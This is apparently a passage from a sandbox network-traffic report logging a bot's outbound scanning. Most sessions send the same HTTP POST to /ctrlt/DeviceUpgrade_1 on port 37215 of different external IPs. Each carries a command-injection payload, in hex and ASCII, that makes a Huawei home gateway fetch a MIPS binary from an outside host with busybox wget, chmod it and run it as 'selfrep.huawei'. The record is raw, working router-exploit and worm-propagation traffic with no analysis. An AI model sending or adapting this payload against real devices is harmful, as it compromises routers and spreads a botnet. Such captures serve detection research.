                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2156192.168.2.1544948157.245.227.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107825041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2157192.168.2.1540134197.195.245.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107933044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2158192.168.2.1538230160.21.136.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107952118 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2159192.168.2.154481470.6.101.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107985973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2160192.168.2.153825841.221.52.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.108191013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2161192.168.2.1560410208.46.2.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.108213902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2162192.168.2.1549480131.36.73.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.112231016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2163192.168.2.153640241.160.172.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.113395929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2164192.168.2.155743841.170.109.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.113493919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2165192.168.2.1534410197.117.29.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.113518953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
